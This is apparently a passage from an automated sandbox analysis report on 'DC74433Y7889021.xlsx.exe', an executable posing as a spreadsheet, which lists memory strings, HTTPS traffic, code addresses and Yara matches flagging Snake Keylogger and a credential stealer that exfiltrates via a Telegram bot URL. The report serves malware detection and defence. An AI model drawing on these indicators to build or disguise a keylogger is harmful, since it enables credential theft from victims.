                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000355E000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003702000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003585000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003560000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003518000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000368F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000355E000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003702000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003585000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003560000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003518000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000368F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 0_2_02B5D3DC0_2_02B5D3DC
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023BD2781_2_023BD278
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B53621_2_023B5362
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023BC1461_2_023BC146
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023BC7381_2_023BC738
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023BC4681_2_023BC468
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023BCA081_2_023BCA08
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B69A01_2_023B69A0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023BE9881_2_023BE988
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B3E091_2_023B3E09
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023BCFAA1_2_023BCFAA
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B6FC81_2_023B6FC8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023BCCD81_2_023BCCD8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B9DE01_2_023B9DE0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B3AA11_2_023B3AA1
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023BE97A1_2_023BE97A
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023BF9611_2_023BF961
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B39EE1_2_023B39EE
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B29EC1_2_023B29EC
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E1E801_2_060E1E80
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E0B301_2_060E0B30
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E17A01_2_060E17A0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E9C181_2_060E9C18
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E50281_2_060E5028
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EFC681_2_060EFC68
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E95481_2_060E9548
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E29681_2_060E2968
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EDE001_2_060EDE00
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EE24A1_2_060EE24A
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EE2581_2_060EE258
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E1E701_2_060E1E70
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EE6AF1_2_060EE6AF
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EE6B01_2_060EE6B0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EEAF81_2_060EEAF8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EEB081_2_060EEB08
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E0B201_2_060E0B20
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EEF511_2_060EEF51
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EEF601_2_060EEF60
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E178F1_2_060E178F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E8BA01_2_060E8BA0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EF3B81_2_060EF3B8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EF8021_2_060EF802
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E50181_2_060E5018
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EF8101_2_060EF810
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E003F1_2_060E003F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E00401_2_060E0040
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060ECC8F1_2_060ECC8F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060ECCA01_2_060ECCA0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060ED0E91_2_060ED0E9
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060ED0F81_2_060ED0F8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060ED5401_2_060ED540
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060ED5501_2_060ED550
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060ED9991_2_060ED999
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060ED9A81_2_060ED9A8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060EDDFF1_2_060EDDFF
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_08F81B881_2_08F81B88
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_08F81B791_2_08F81B79
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_0908733F1_2_0908733F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_090866C01_2_090866C0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_090866C01_2_090866C0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_090D1BF01_2_090D1BF0
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688208679.0000000005620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1681361916.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $dq,\\StringFileInfo\\000004B0\\OriginalFilename vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000000.1664986249.0000000000A72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePumoa.exe, vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688025418.0000000005590000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $dq,\\StringFileInfo\\040904B0\\OriginalFilename vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $dq,\\StringFileInfo\\000004B0\\OriginalFilename vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4138595927.00000000066C9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exeBinary or memory string: OriginalFilenamePumoa.exe, vs DC74433Y7889021.xlsx.exe
                    Source: DC74433Y7889021.xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
